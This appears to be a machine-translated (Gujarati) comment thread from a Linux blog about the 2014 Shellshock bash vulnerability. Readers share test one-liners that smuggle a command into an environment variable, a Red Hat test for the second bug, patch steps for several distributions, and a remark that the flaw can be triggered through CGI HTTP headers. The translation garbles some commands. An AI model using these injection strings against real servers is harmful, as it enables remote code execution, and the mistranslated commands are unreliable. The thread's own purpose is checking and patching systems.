    આ એક કસોટી છે

    ઉબુન્ટુ સ્ટુડિયો 14.04 માટે હજી સુધી કોઈ પેચ નથી

    1.    વિસપ જણાવ્યું હતું કે

      ઉબુન્ટુ સ્ટુડિયો 14.04.1 માં સમારકામ
      wisp @ ubuntustudio: ~ v env x = '() {:;}; ઇકો નબળાઈવાળા 'bash -c "ઇકો આ એક કસોટી છે
      bash: ચેતવણી: x: ફંક્શન વ્યાખ્યા પ્રયાસને અવગણીને
      bash: `x 'માટે કાર્ય વ્યાખ્યા આયાત કરવામાં ભૂલ
      આ એક કસોટી છે

  9.   રોડર જણાવ્યું હતું કે

    ખરેખર તે એક નબળાઈ છે, જો તે તમને અસર કરે તો તે તે છે કે તમે પહેલાં કંઇક ખોટું કરી રહ્યા હતા ...

    કારણ કે બેશ સ્ક્રિપ્ટ જે રૂટ વિશેષાધિકારો સાથે ચાલે છે તે ક્યારેય વપરાશકર્તાની સામે હોવી જોઈએ નહીં. અને જો તે કોઈ વિશેષાધિકારો વિના ચાલે છે, તો આવી કોઈ દોડધામ નથી. ખરેખર, તે બકવાસ છે. ખૂબ scaremongering.

    1.    ઝેરીક્સ જણાવ્યું હતું કે

      મને પણ એવું જ લાગે છે.

    2.    સ્ટાફ જણાવ્યું હતું કે

      બરાબર, વધુ અખબારો વેચવા અથવા વધુ મુલાકાતો મેળવવા માટે, આ ભૂલો સારી છે.
      પરંતુ તેઓ હંમેશાં એ કહેવાનું ભૂલી જાય છે કે કમ્પ્યુટરને આ પ્રકારની સ્ક્રિપ્ટો સાથે સમાધાન કરવા માટે, તમારે પહેલા બાશની accessક્સેસ હોવી જ જોઇએ અને પછી તેને રુટ તરીકે હોવી જોઈએ.

      1.    ડેરિઓ જણાવ્યું હતું કે

        સ્ટાફ જો તમે cgi સાથે અપાચે વાપરો, તો ફક્ત કૂકીઝ તરીકે HTTP હેડરોમાં મુકો અથવા તમે ચલાવવા માંગતા હો તે કાર્યનો સંદર્ભ લો. તેનો ઉપયોગ કીડા ફેલાવવા માટે પણ કરવામાં આવ્યો છે.

    3.    ડેરિઓ જણાવ્યું હતું કે

      અને જો કોઈ વિજેટ mishell.php સાથે સર્વર પર શેલ મૂકે છે, તો તે કિસ્સામાં તે ગંભીર નથી, તે છે?

    4.    ઇલિયોટાઇમ 3000 જણાવ્યું હતું કે

      તમારી સાથે સંમત. મેં વિચાર્યું કે તે હાર્ટબ્લેડ (જે એનએસએએ પણ પોતાને વિકૃત કરવા માટે આપ્યું હતું) જેવું વિશાળ ભૂલ હતું, પરંતુ તે એક નાના ભૂલ હતી.

      ત્યાં ખરેખર ખરેખર ગંભીર ભૂલો છે જેમ કે ફ્લેશનો ઉન્મત્ત વપરાશ અને મરી ફ્લેશ પ્લેયરમાં પરફોર્મન્સ ડ્રોપ, અને તે જે પહેલાથી જ સુધારેલ છે ક્રોમ અને ફાયરફોક્સમાં વેબઆરટીસી બગ.

  10.   બાઈન્ડરમેન જણાવ્યું હતું કે

    શું તમે જાણો છો કે જો તેમાં લિનક્સ મિન્ટ 16 ધરાવતા લોકો માટે કોઈ ગોઠવણ છે?

  11.   ઓસ્કાર જણાવ્યું હતું કે

    ડેબિયન પરીક્ષણમાં તે પહેલાથી નિશ્ચિત હતું.

  12.   યોયો જણાવ્યું હતું કે

    મારી 5 ડિસ્ટ્રોસમાં તે હલ થાય છે, મારા ઓએસ એક્સમાં મને ખબર નથી.

    કૃપા કરીને મારી ટિપ્પણીને સેન્સર ન કરો, મેં ઓએસ એક્સ કહ્યું. મને ખબર નથી કે તમે આ સાઇટ પર ઓએસ એક્સ કહી શકો કે નહીં.

    1.    tannhauser જણાવ્યું હતું કે

      @ યોયો સારી રીતે તેને બહાર ન કા don'tો કે તેઓ હજી પણ પેચની કેટલીક વિગતો પર કામ કરી રહ્યાં છે ... આ પ્રયાસ કરો અને પછી મને કહો કે એક્સડી કેવી રીતે

      env x = '() {:;}; ઇકો નબળાં 'બેશ-સી "ઇકો હું આઇફોન 6 ની કચરાપેટીથી વધુ સંવેદનશીલ છું.

      હું જો કંઈપણ હોડ લગાવી તે પહેલાં ઓએસ એક્સ પહેલાં તેઓ 100% હલ કરે છે

    2.    ઇલિયોટાઇમ 3000 જણાવ્યું હતું કે

      સારું, આર્સ ટેક્નિકામાં પણ તેઓ ઓએસએક્સમાં બાશને પ્રાસંગિકતા આપે છે.

    3.    ઇલાવ જણાવ્યું હતું કે

      @ યોયો આગળની ટિપ્પણી સ્પામ માટે ઓએસ એક્સ પર .. lla tu save .. 😛

  13.   tannhauser જણાવ્યું હતું કે

    @yoyo ત્યાં અવતરણોને સુધારવા માટે ... પરંતુ બાકી તમે જાણો છો 😉

  14.   ડાયઝેપન જણાવ્યું હતું કે
    1.    ઇલિયોટાઇમ 3000 જણાવ્યું હતું કે

      જેમ કે તેઓ ઓએસએક્સ સાથે પેટ્રોનાઇઝિંગ બની ગયા છે (કારણ કે ઓએસએક્સ હજી પણ બાશનો ઉપયોગ કરે છે: વી).

      તો પણ, મારે ડેબિયન જેસી સાથે ખૂબ ગડબડ કરવાની જરૂર નથી.

  15.   elhui2 જણાવ્યું હતું કે

    જો સિસ્ટમ સેન્ટ ઓએસ પર નબળાઈ છે:
    yum બધા અને & yum અપડેટ બashશને સાફ કરો

    bash સંસ્કરણ જોવા માટે:
    rpm -qa | ગ્રેપ બેશ

    જો સંસ્કરણ bash-4.1.2-15.el6_5.1 કરતાં પહેલાંની છે, તો તમારી સિસ્ટમ સંવેદનશીલ હોઈ શકે છે!

    શુભેચ્છાઓ.

  16.   મેન્યુઅલપીરેઝફ જણાવ્યું હતું કે

    2 જી નબળાઈ હજી સુધી ઉકેલી નથી

    env amvariable2 = '() {(a) => sh' sh -c "ઇકો amVulnerable"; bash -c "ઇકો નિષ્ફળતા 2 અનપેચડ"

  17.   જીસસ પેરેલ્સ જણાવ્યું હતું કે

    અપડેટ કરી રહ્યું છે ...

  18.   સ્વિચર જણાવ્યું હતું કે

    વિપરીત મને જેન્ટુમાં થાય છે, હું ફક્ત પ્રથમ નિષ્ફળતા માટે જ સંવેદનશીલ છું પરંતુ બીજી સાથે મને આ મળે છે:
    [કોડ] શ: એક્સ: લાઇન 1: અનપેક્ષિત તત્વની નજીક સિન્થેટીક ભૂલ `= '
    sh: X: વાક્ય 1: '' '
    sh: 'X' માટે કાર્ય વ્યાખ્યા આયાત કરવામાં ભૂલ
    sh: નિર્બળ: આદેશ મળ્યો નથી
    બગ 2 પેચો નથી
    [/ કોડ]
    મને ખબર નથી કે ત્યાં પહેલાથી જ બગ્સ સાથે સ્થિર સંસ્કરણ હશે કે નહીં, પરંતુ બંને રીતે તે આગામી સમય માટે બાકી રહેશે જ્યારે હું ઉદભવ કરું છું - સિન્ક એન્ડ એન્ડ emergeપ્ટ-એડેપી-સાથે-બીડીપ્સ = અને - newuse @world (આ રીતે હું આખી સિસ્ટમને અપડેટ કરું છું).

    1.    યુકીતો જણાવ્યું હતું કે

      મારી પાસે આવૃત્તિ 4.2.૨_p50 સાથે જેન્ટુ છે અને અત્યાર સુધી તે તમામ પરીક્ષણોમાં પસાર થઈ ગયું છે. ઉભરતા –સિંકનો પ્રયાસ કરો અને ત્યારબાદ -av1 એપ્લિકેશન-શેલ / બેશ ઉભરી લો અને પછી તપાસો કે તમે બેશ –version આદેશનો ઉપયોગ કરીને વર્ઝન 4.2_p50 છે.

  19.   ફેર જણાવ્યું હતું કે

    તમે આ પ્રયાસ કર્યો છે?

    અને નવા પેકેજો સાથે, Red Hat દ્વારા પ્રદાન થયેલ નવી પરીક્ષા

    સીડી / ટેમ્પ; આરએમ-એફ / ટીએમપી / ઇકો; env 'x = () {(a) => b' bash -c "ઇકો ડેટ"; બિલાડી / tmp / પડઘો

    જો આપણી સિસ્ટમ નબળી નથી અને યોગ્ય રીતે પેચ કરી છે, તો તે આપણને આવું કંઈક આપશે
    1 તારીખ
    2 બિલાડી: / tmp / ઇકો: ફાઇલ અથવા ડિરેક્ટરી અસ્તિત્વમાં નથી

  20.   યુકીતો જણાવ્યું હતું કે

    આ રીતે અજમાવો:

    env X = '() {(a) => sh' sh -c "ઇકો સંવેદનશીલ"; bash -c "ઇકો નિષ્ફળતા 2 પેચ"

    હું વિચાર

    નબળા
    ભૂલ 2 પેચો.

    1.    યુકીતો જણાવ્યું હતું કે

      તેને ભૂલી જાઓ, લીટી ખરાબ રીતે ફોર્મેટ થઈ છે.

  21.   ઓસ્કર મેઝા જણાવ્યું હતું કે

    ઉત્તમ! મેં પહેલાથી જ મારા સ્લેકવેર પર અપડેટ કર્યું છે, આભાર!

  22.   લોથબ્રોક જણાવ્યું હતું કે

    હાય, એક પ્રશ્ન .ભો થાય છે, મારી પાસે "સુસ લિનક્સ એન્ટરપ્રાઇઝ સર્વર 10" 64 બિટ્સવાળા ઘણા સર્વર્સ છે.
    જ્યારે હું આદેશોને અમલમાં મૂકું છું ત્યારે હું સંવેદનશીલ હોઉં છું, ત્યારે હું આઇફોન 6 એક્સડી કચરાપેટીથી પણ વધુ સંવેદનશીલ છું
    જો સુઝમાં પેકેજોને અપડેટ / ઇન્સ્ટોલ કરવું હું ખોટું નથી, તો તે «ઝિપર the આદેશથી કરવામાં આવે છે.

    કેટલાક સર્વર્સ પર તે મને આ કહે છે:

    દ્વિસંગી: ~ # ઝિપર અપ
    -બેશ: ઝિપર: આદેશ મળ્યો નથી
    દ્વિતીય: ~ #

    અને અન્યમાં આ:

    એસએમબી: z # ઝિપર અપ
    સિસ્ટમ સ્રોતોને પુનર્સ્થાપિત કરી રહ્યાં છે ...
    સુસે લિનક્સ એન્ટરપ્રાઇઝ સર્વર 10 એસપી 2-20100319-161944 માટે મેટાડેટા પાર્સ કરી રહ્યું છે…
    RPM ડેટાબેઝનું વિશ્લેષણ કરી રહ્યું છે ...
    સારાંશ:
    નવરાશ.

    હું શું કરું?
    હું જાણું છું કે કેટલાક કહે છે કે નબળાઈઓ તેઓ જે રંગ કરે છે તેના કરતા ઓછી હોય છે પરંતુ મારી પાસે છે અને હું જોખમનો સામનો કરવા માંગતો નથી, પછી તે નાનો હોય કે મહાન.

    શુભેચ્છાઓ.

  23.   સેન્ડર્સ ગુટીરેઝ જણાવ્યું હતું કે

    શુભ રાત્રિ, મેં તમને લેખમાં પ્રદાન કરેલો કોડ પેસ્ટ કરવાનો પ્રયાસ કર્યો છે, હું આ મેળવી શકું છું
    સેન્ડર્સ @ પીસી-સેન્ડર્સ: ~ v env x = '() {:;}; ઇકો નબળાં 'બેશ-સી "ઇકો આ એક કસોટી છે
    આ એક કસોટી છે
    સેન્ડર્સ @ પીસી-સેન્ડર્સ: ~ $
    શું તમે કૃપા કરી મને ડિસ્ટ્રોને કેવી રીતે પેચ કરવું તે સમજાવી શકશો, હું દરરોજ અપડેટ કરું છું અને મને પ્રોમ્પ્ટના આઉટપુટમાં ફેરફાર દેખાતો નથી.

    આભાર!